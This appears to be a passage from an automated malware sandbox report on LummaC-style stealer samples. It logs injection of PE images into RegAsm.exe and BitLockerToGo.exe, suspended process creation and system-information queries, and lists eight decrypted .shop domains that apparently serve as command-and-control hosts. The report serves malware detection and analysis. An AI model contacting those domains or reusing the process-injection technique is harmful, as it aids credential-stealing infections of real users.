Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x140F68E97 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x140F6956E Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtClose: Direct from: 0x140F6157B
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x14183B5C6 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x141793664 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtMapViewOfSection: Direct from: 0x1417C8CFD Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x1417BEF5F Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x1417A9B34 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtUnmapViewOfSection: Direct from: 0x14181B636 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x141817E99 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x140F5F1B5 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x141792D37 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Indirect: 0x140F2B0BD Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Memory written: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
LummaC encrypted strings found
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: caffegclasiqwp.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stamppreewntnq.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stagedchheiqwo.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: millyscroqwp.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: evoliutwoqm.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: condedqpwqm.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: traineiwnqo.shop
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: locatedblsoqp.shop
Writes to foreign memory regions
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56B000 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D8000 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BB9008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 7C4008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 456000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 651000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 652000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DC2008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A8C008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 653008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D3F008 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 6DC008
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Process created: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe "C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8032 -ip 8032
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8024 -ip 8024
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 852
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 824
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: unknown unknown
Source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2281546766.0000000004215000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Progman
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0053D8FE cpuid 2_2_0053D8FE
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: GetLocaleInfoA, 7_2_0040520C
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: GetLocaleInfoA, 7_2_00405258
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Queries volume information: C:\Users\user\Desktop\gobEmOm5sr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Queries volume information: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Queries volume information: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Queries volume information: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Queries volume information: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Queries volume information: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Queries volume information: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
